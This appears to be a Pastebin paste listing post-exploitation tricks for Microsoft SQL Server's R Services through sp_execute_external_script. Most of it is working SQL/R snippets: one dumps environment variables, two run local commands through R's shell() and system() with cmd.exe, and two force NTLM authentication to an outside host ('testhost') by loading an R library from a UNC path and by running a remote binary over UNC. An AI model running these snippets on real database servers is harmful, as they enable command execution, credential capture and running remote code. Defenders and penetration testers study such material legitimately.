Advertisement
Guest User

MS-SQL with R

a guest
Jun 7th, 2017
3,610
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Starting with MS-SQL 2016 MS has allowed for the inclusion of the Microsoft R Server services, permitting the execution of R scripts in the MS-SQL environment. In order for this funcitonality to be enabled, the R services for SQL server component must be installed, the server must be reconfigured to permit sp_exectue_external_script, and a user must be granted the 'EXECUTE ANY EXTERNAL SCRIPT' permission; yes, all of this is becoming increasingly more common.
  2.  
  3. Once these conditions are in place, SQL users will have R capabilities in their queries through the use of sp_execute_external_script().
  4.  
  5. This can be 'fun'..
  6.  
  7. Sample R query in MS-SQL (from MSDN):
  8.  
  9. EXEC sp_execute_external_script
  10. @language=N'R',
  11. @script=N'OutputDataSet <- InputDataSet',
  12. @input_data_1=N'SELECT 1 AS hello'
  13. WITH RESULT SETS (([hello] int not null));
  14. GO
  15.  
  16. Get the current R environment variables:
  17.  
  18. EXEC sp_execute_external_script
  19. @language=N'R',
  20. @script=N'OutputDataSet <- data.frame(c(EnvVals=Sys.getenv()))'
  21. WITH RESULT SETS (([EnvVals] TEXT));
  22. GO
  23.  
  24. Forced remote authentication via library inclusion:
  25.  
  26. EXEC sp_execute_external_script
  27. @language=N'R',
  28. @script=N'.libPaths("\\\\testhost\\foo\\bar");library("0mgh4x")'
  29. WITH RESULT SETS (([FileLines] TEXT));
  30. GO
  31.  
  32. Local command execution through R shell():
  33.  
  34. EXEC sp_execute_external_script
  35. @language=N'R',
  36. @script=N'OutputDataSet <- data.frame(shell("dir",intern=T))'
  37. WITH RESULT SETS (([cmd_out] text));
  38. GO
  39.  
  40. Local command execution through R system():
  41.  
  42. EXEC sp_execute_external_script
  43. @language=N'R',
  44. @script=N'OutputDataSet <- data.frame(system("cmd.exe /c dir",intern=T))'
  45. WITH RESULT SETS (([cmd_out] text));
  46. GO
  47.  
  48. Forced remote authentication via UNC execution:
  49.  
  50. EXEC sp_execute_external_script
  51. @language=N'R',
  52. @script=N'OutputDataSet <- data.frame(system("cmd.exe /c \\\\testhost\\no\\bin.exe",intern=T))'
  53. WITH RESULT SETS (([cmd_out] text));
  54. GO
  55.  
  56. As with most things in the realm of post-exploitation, if someone can do this, you've got bigger problems to worry about.
  57.  
  58. -whitey
Advertisement
RAW Paste Data Copied
Advertisement